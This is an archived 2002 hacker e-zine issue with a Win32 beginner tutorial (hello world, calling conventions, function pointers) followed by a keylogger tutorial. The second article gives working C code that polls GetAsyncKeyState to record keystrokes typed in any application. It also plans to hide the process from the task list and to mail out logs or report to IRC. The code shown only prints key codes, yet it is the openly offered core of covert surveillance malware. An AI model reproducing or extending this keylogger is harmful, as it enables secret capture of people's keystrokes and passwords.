hh2.html

Posted Jul 22, 2003
Authored by hh | Site infosecwriters.com

The Hitchhiker's World Issue 2: Notes on Win32 programming, Keylogger in an API (Part #1).

systems | windows
SHA-256 | b14b00ecbe106388135e2485324abe441bf8fb645734512698128c6f86ff1040

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="keywords" content="hitchhiker, security magazine, security holes, exploit, buffer overflow, vulnerability, security writers, malware, virus, trojan, security writers">
<meta name="description" content="The HH's World features mostly network-security articles/programs along with a touch of personal expression. Entries & comments are welcomed.">
<META NAME="AUTHOR" CONTENT="Arun Koshy">
<title>Securitywriters.org - Hitchhiker's World - Zine #</title>

<link rel="stylesheet" type="text/css" href="libstyle.css">

</head>
<body>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="120">
<tr>
<td width="100%" height="43" align="center" class="bluelink">
<p class="title">The Hitchhiker's World <br>
Issue #2</p>
</td>
</tr>
<tr>
<td width="100%" height="19">
<div align="center">
<p><b>Soli Deo gloria - To God alone be glory</b></p>
</div>
</td>
</tr>
<tr>
<td width="100%" height="19">
<p>Released : 28th March' 2002</p>
</td>
</tr>
<tr>
<td width="100%" height="19">
<p>Editor : <a href="mailto:hwcol@arunkoshy.cjb.net">Arun Koshy</a></p>
</td>
</tr>
<tr>
<td width="100%" height="19">
<p>Contributors : <a href="mailto:root@ayanthegreat.cjb.net">Ayan Chakrabarti</a></p>
</td>
</tr>
</table>
<p><B>DISCLAIMER :</B> [Insert the biggest, most comprehensive lawyerspeak here].
<B>Securitywriters.org (SWG) or the author(s) are NOT RESPONSIBLE for anything</B>
that happens to you, ur cat, dog, sexlife or wife after you go through the information
presented below. Enjoy.</P>
<p><br>
Contents<BR>
<BR>
</P>
<UL>
<LI><A
href="#ART1">Notes on Windows Programming</A><BR>
<br>
{ Notes : <font face="Arial, Helvetica, sans-serif" size="2">A launch pad
for Win32; will deviate in the future to a lot of grey topics :-)</font> }<br>
{ Contrib : Hitchhiker } <BR>
</LI>
</UL>
<UL>
<LI>
<P ><A
href="#ART2">Advanced Meal</A><BR>
<br>
{ Notes : <font face="Arial, Helvetica, sans-serif" size="2">Case Study
- A keylogger in an API }</font><br>
{ Contrib : Ayan Chakrabarti }<BR>
</P>
</LI>
</UL>
<hr>
<P > <A name=EDIT></A><span class="text_head1">Editorial</span> </P>
<P ><font face="Arial, Helvetica, sans-serif" size="2"><b>[March]</b></font><br>
</P>
<p align="left"><font face="Arial, Helvetica, sans-serif" size="2">I had been
thinking about how to keep myself sane during these times. Usually when you feel
that lot of things are out of your control, you should just concentrate on things
which you can change. I've decided to start this column after seeing how it
will help me keep my own perspective on things. </font></p>
<p align="left"><font face="Arial, Helvetica, sans-serif" size="2">Generally this
would be a more suitable format for me to contribute, as it will feature weekly
or at the max monthly updates on whatever new thing I play around with. It would
also get me a chance to learn from the great people who have become my friends
and gurus :).</font></p>
<P ><span class="text_head1">Contribute! Learn! Discuss!</span><BR>
<BR>
<span class="text_head2">Contact:</span><BR>
You're invited to send in your entries, comments et al. for publication to <A
href="mailto:hwcol@arunkoshy.cjb.net">hwcol@arunkoshy.cjb.net</A> </P>
<P><span class="text_head2">Hot Topics (but definitely not restricted to):</span><BR>
algorithms, stuff related to systems programming and applied network security.</P>
<P><span class="text_head2">Style:</span><BR>
SWG advocates a "hands-on" approach: get to the code or the point. Provide references
and links if necessary (especially if you're presenting a fresh perspective
on something already known).</P>
<hr>
<p> <A name="ART1"></A><span class="text_head1">Notes on Windows Programming<br>
</span><a href="http://www.arunkoshy.cjb.net" target="_blank">By Arun Darlie
Koshy</a></p>
<p align="left"><font face="Arial, Helvetica, sans-serif" size="2">Over the past
few months, I've been glad to notice people asking questions about assemblers and
systems-level programming. We love to talk about how system utilities, malware
and "elite" programs are written or how they affect our lives. But
only a few people wish to move beyond the buzz and do their own thing. <br>
<br>
This is my small coin in the pot. First of all, let's get our tools. I assume
you're broke like me and don't want to buy anything, even when developing for
Windoze. </font></p>
<p align="left"><font face="Arial, Helvetica, sans-serif" size="2">In case you
do have money, it would be excellent if you get a copy of Charles Petzold's
Programming Windows (5th Ed). I bought the book and it also had an electronic
version on the CD. I would have put it up for download, but then it feels like
you're disrespecting a good teacher. Someone should ask Mr. Charles to
release it free for people, or you can find a friend who has the book.</font></p>
<p align="left"><font face="Arial, Helvetica, sans-serif" size="2">Here's what
we need :</font></p>
<p align="left"><font face="Arial, Helvetica, sans-serif" size="2"><b>Our C/C++
Tool</b></font></p>
<ul>
<li><font face="Arial, Helvetica, sans-serif" size="2"><a href="http://www.borland.com/bcppbuilder/freecompiler/" target="_blank">http://www.borland.com/bcppbuilder/freecompiler/</a></font></li>
</ul>
<p><font face="Arial, Helvetica, sans-serif" size="2"><b>Some docs to help you
out with the install :</b></font></p>
<ul>
<li><font face="Arial, Helvetica, sans-serif" size="2"><a href="http://community.borland.com/article/0,1410,21205,00.html" target="_blank">http://community.borland.com/article/0,1410,21205,00.html</a></font></li>
</ul>
<ul>
<li><font face="Arial, Helvetica, sans-serif" size="2"><a href="http://www.pharo.onlinehome.de/Bcc55.html" target="_blank">http://www.pharo.onlinehome.de/Bcc55.html</a></font></li>
</ul>
<p align="left"><font face="Arial, Helvetica, sans-serif" size="2"><b>Assembler</b></font></p>
<ul>
<li><font face="Arial, Helvetica, sans-serif" size="2"><a href="http://www.win32asm.cjb.net" target="_blank">http://www.win32asm.cjb.net</a>
(Make sure you download Iczelion's tutorials, the MASM pack)</font></li>
</ul>
<p><font face="Arial, Helvetica, sans-serif" size="2"> Let's now start with a
simple hello world program for Windows :</font></p>
<p><br>
<p class="code">/* Hello.c - the nth version in the history of humankind */<br>
#include &lt;windows.h&gt;<br>
<br>
/* WinMain takes four parameters (see note 2 below); we don't use them yet */<br>
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;LPSTR lpCmdLine, int nCmdShow)<br>
{<br>
&nbsp;&nbsp;/* no owner window, message text, caption, and MB_OK for a single OK button */<br>
&nbsp;&nbsp;MessageBox(NULL, "War Sucks", "This is my message..", MB_OK);<br>
&nbsp;&nbsp;return 0;<br>
}</p>
<p><font face="Arial, Helvetica, sans-serif" size="2"><br>
This looks as simple as the K&amp;R example. Build it with "bcc32 -tW -5
hello.c". Let's now take it apart :</font></p>
<p><font face="Arial, Helvetica, sans-serif" size="2">1. windows.h - you can think
of this as a master include file, something like your stdio.h</font></p>
<p><font face="Arial, Helvetica, sans-serif" size="2">2. WinMain() is the Windows
equivalent of main(); it also has some parameters which need to be passed
(like argc, argv),<br>
but we won't deal with them till we learn more.</font></p>
<p><font face="Arial, Helvetica, sans-serif" size="2">3. WINAPI is a macro that expands
to a compiler directive. Fire up your bcc55\include\windef.h and search for the string
"WINAPI" .. it throws up the following (important) matches :</font></p>
<p class="code">#define APIENTRY WINAPI<br>
#define WINAPI __stdcall</p>
<p><font face="Arial, Helvetica, sans-serif" size="2">Basically __stdcall is a
type of "calling convention" and is the one most widely used for Win32 API
functions. To understand the whole story, we would need to dip a bit into the
program's equivalent assembler code .. at present, just keep the following in
your mind :</font></p>
<ul>
<li><font face="Arial, Helvetica, sans-serif" size="2"> APIENTRY and WINAPI
mean the same thing<br>
<br>
</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2">arguments are pushed
from right to left (e.g. for foo(int x, int y), y is pushed on the stack first,
then x)<br>
<br>
</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2">the called function is
responsible for its own stack (i.e. it pops its own arguments and balances the
stack pointer before returning)</font></li>
</ul>
<p><font face="Arial, Helvetica, sans-serif" size="2"><b>Refer and read :</b><br>
</font></p>
<ul>
<li><font face="Arial, Helvetica, sans-serif" size="2"><i>Iczelion's "Tutorial
1 : The Basics" (you should have downloaded the tutes by now!)<br>
<br>
</i></font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2"><a href="http://www.codeproject.com/useritems/calling_conventions_demystified.asp" target="_blank"><i>Calling
conventions demystified by Nemanja Trifunovic</i></a></font></li>
</ul>
<p><font face="Arial, Helvetica, sans-serif" size="2">4. The MessageBox()
API .. now we come to the meat of the program .. our printf() equivalent in
this world. Check your MSDN documentation or <a href="http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/dlgboxes_76bc.asp" target="_blank">this
link</a> </font></p>
<p><font face="Arial, Helvetica, sans-serif" size="2">From that we understand
that we are making a "MessageBox" component with NULL as its hWnd (no owner window),
"War Sucks" (a string) as the text in the message box, "This
is my message.." as the caption, and "MB_OK" (defined in the
headers) so that the box gets its "OK" button. The rest of the program should be self-explanatory.</font></p>
<p><font face="Arial, Helvetica, sans-serif" size="2">While in the Win32 world,
get ready to <b>deal with :</b></font></p>
<ul>
<li><font face="Arial, Helvetica, sans-serif" size="2">a ton of baggage/conventions</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2">many interesting "features"</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2">you can see OOP in action</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2">many unheard-of constructs
and language features which are never used in the command-line world</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2">you need to understand
the architecture and concepts like how the OS "messages" your program</font></li>
</ul>
<p><font face="Arial, Helvetica, sans-serif" size="2"><b>Tips</b></font></p>
<ul>
<li><font face="Arial, Helvetica, sans-serif" size="2">Always have MSDN with
you for ready reference</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2"> check the header files
for more details</font></li>
</ul>
<p><font face="Arial, Helvetica, sans-serif" size="2">You may need to refresh
your concepts about pointers to functions; here's a small program to help you :
</font></p>
<p class="code">#include &lt;iostream&gt;<br>
using namespace std;<br>
<br>
void xi(void)<br>
{<br>
&nbsp;&nbsp;cout &lt;&lt; "\nI am the function which is pointed to :-)";<br>
}<br>
<br>
int main()<br>
{<br>
&nbsp;&nbsp;// xir is a pointer to a function taking no arguments and returning void.<br>
&nbsp;&nbsp;// Without the brackets, "void *xir(void)" would declare a function<br>
&nbsp;&nbsp;// returning void* because of operator precedence.<br>
&nbsp;&nbsp;void (*xir)(void);<br>
<br>
&nbsp;&nbsp;// the address can simply be found by referring to the function without<br>
&nbsp;&nbsp;// the (), just like an array's name gives the array's address<br>
&nbsp;&nbsp;xir = xi;<br>
<br>
&nbsp;&nbsp;xir();&nbsp;&nbsp;// call through the pointer<br>
&nbsp;&nbsp;return 0;<br>
}</p>
<p><font face="Arial, Helvetica, sans-serif" size="2">The use of these becomes
clear when you deal with things like WNDCLASS. This is also a good time for a
quick refresh of your C basics. We've only started .. watch this space.</font></p>
<hr>
<P ><A name="ART2"></A><span class="text_head1">Advanced Meal - A keylogger in an API<br>
</span><a
href="http://ayanthegreat.cjb.net" target="_blank">By Ayan Chakrabarti</a></P>
<p align="left"><font face="Arial, Helvetica, sans-serif" size="2">Many people
are curious to learn about how a keylogger works. Here's Ayan trying to explain
:</font></p>
<p align="left"><font face="Arial, Helvetica, sans-serif" size="2">During the
MS-DOS era, making a keylogger involved serious low-level programming. We had
to hook the keyboard device interrupt, redirect it to our own handler, log each
key and finally call the original handler. The official way to log keystrokes
in Windows is something similar, involving system-wide hooks and what not. </font></p>
<p align="left"><font face="Arial, Helvetica, sans-serif" size="2">Thanks to our
friends at Redmond, there's an easier way - a much easier way... in fact, amazing.</font></p>
<p><font face="Arial, Helvetica, sans-serif" size="2">Enter the GetAsyncKeyState
API. It's a pretty useful function as far as keyloggers are concerned (in fact,
it's difficult to imagine what other possible use it could have). Simply put,
you pass a key code and it'll return whether that key has been pressed since
the last call to the function. </font></p>
<p><font face="Arial, Helvetica, sans-serif" size="2">Yup, that's right. With
this function you can keep track of any key pressed in any application running
on the system. OK, enough theory. Let's take a look at the anatomy of a keylogger
and how this project will evolve : </font></p>
<ul>
<li><font face="Arial, Helvetica, sans-serif" size="2">continuously keep calling
GetAsyncKeyState with all the different key codes to keep track of which keys are
pressed. <br>
<br>
</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2">then store the keystrokes
in a file. <br>
<br>
</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2">ensure that all this
is done without loss in system performance<br>
<br>
</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2">the keylogger process
should not be visible in the tasklist<br>
<br>
</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2">another good feature
would be to be able to mail the log files or announce a control unit on irc
;-)<br>
</font></li>
</ul>
<p><font face="Arial, Helvetica, sans-serif" size="2"> STEP 1 : Getting to know
the logic and basic feel <br>
<br>
We will start with the basic shell (i.e. the first step mentioned in the process above)
and I expect you to try and work at it independently. </font></p>
<p class="code">#include &lt;windows.h&gt;<br>
#include &lt;stdio.h&gt;<br>
<br>
/* virtual-key codes to poll; the trailing 0 terminates the list */<br>
unsigned int nlist[] = { 8,9,12,13,19,20,27,32,33,34,35,36,37,38,39,<br>
40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,<br>
57,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,<br>
81,82,83,84,85,86,87,88,89,90,91,93,96,97,98,99,100,<br>
101,102,103,104,105,106,107,108,109,110,111,112,113,<br>
114,115,116,117,118,119,120,121,122,123,124,125,126,<br>
127,128,129,130,131,132,133,134,135,144,145,186,187,<br>
188,189,190,191,192,219,220,221,222,223,224,225,226,<br>
227,228,230,233,234,235,236,237,238,239,240,241,242,<br>
243,244,245,246,247,248,249,250,251,252,253,254,0};<br>
<br>
int main(void)<br>
{<br>
&nbsp;&nbsp;int i;<br>
<br>
&nbsp;&nbsp;while(1)&nbsp;&nbsp;/* endless loop; exit with CTRL+C for now */<br>
&nbsp;&nbsp;{<br>
&nbsp;&nbsp;&nbsp;&nbsp;/* stop at the first key reported as pressed since the last call */<br>
&nbsp;&nbsp;&nbsp;&nbsp;for(i = 0; nlist[i] != 0; i++)<br>
&nbsp;&nbsp;&nbsp;&nbsp;{<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(GetAsyncKeyState(nlist[i]) == -32767)<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;<br>
&nbsp;&nbsp;&nbsp;&nbsp;}<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;if(nlist[i] == 0)&nbsp;&nbsp;/* reached the terminator: nothing pressed */<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;continue;<br>
&nbsp;&nbsp;&nbsp;&nbsp;else<br>
&nbsp;&nbsp;&nbsp;&nbsp;{<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf("%d ", nlist[i]);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fflush(stdout);&nbsp;&nbsp;/* show the code at once even if output is redirected */<br>
&nbsp;&nbsp;&nbsp;&nbsp;}<br>
&nbsp;&nbsp;}<br>
&nbsp;&nbsp;return 0;<br>
}</p>
<p><font face="Arial, Helvetica, sans-serif" size="2">Save this as "klog.c"
and use "bcc32 klog.c" to generate the EXE. Open up the DOS box and
run it. Now shift the focus away from the window (i.e. select any other window or
part of your desktop) and type anything .. it should display the codes generated.
This is important because if you type into the klog window, it's not going to
be displayed for obvious reasons.</font></p>
<p><font face="Arial, Helvetica, sans-serif" size="2">You're now staring at the
skeleton of a keylogger :). To exit this program, select the DOS box
again and press CTRL+C.</font></p>
<p><font face="Arial, Helvetica, sans-serif" size="2">What are we doing here ?
Simple .. </font></p>
<ul>
<li><font face="Arial, Helvetica, sans-serif" size="2">we set up an array of
the codes we want to test and an endless loop (this has exit points:
CTRL+C now, and later, when we move fully to Windows mode, we'll use PeekMessage
to detect WM_QUIT events and improve system performance) <br>
<br>
</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2">test repeatedly to check
if a key has been pressed .. check the documentation of GetAsyncKeyState to
know why we're checking against "-32767" to break (as a 16-bit SHORT that is 0x8001:
bit 15 set means the key is down right now, bit 0 set means it was pressed since the
last call).<br>
<br>
</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2">we can't print the 0 control
code (in fact, if you note the array, we've avoided 0 to 7 as they are system
codes) so continue<br>
<br>
</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2">else print the code</font></li>
</ul>
<p><font face="Arial, Helvetica, sans-serif" size="2">Readers are most welcome
to indulge in serious discussions but please refrain from :</font></p>
<ul>
<li><font face="Arial, Helvetica, sans-serif" size="2">asking stupid questions<br>
<br>
</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2">requesting the sources
for any of my non-GPL projects (basically if the source's not on my site ..
don't ask me for it).</font></li>
</ul>
<p><font face="Arial, Helvetica, sans-serif" size="2">We'll see more next week
or so .. till then .. study, learn and enjoy.<br>
<br>
PS : You ought to thank Arun for writing such a simple shell and the "step-by-step"
approach. He has protected you from the torture I had planned for you, the reader
;-).</font></p>
<p>
</td>

</tr>

<tr>

<td colspan="2">




<p align="center"><font size="1" face="Arial, Helvetica, sans-serif"><span class="footer">All
images, content & text (unless other ownership applies) are &copy; copyrighted
2003, Infosecwriters.com. All rights reserved. Comments are property of
the respective posters.</span></font></p>

</td>

</tr>

</table>

</body>

</html>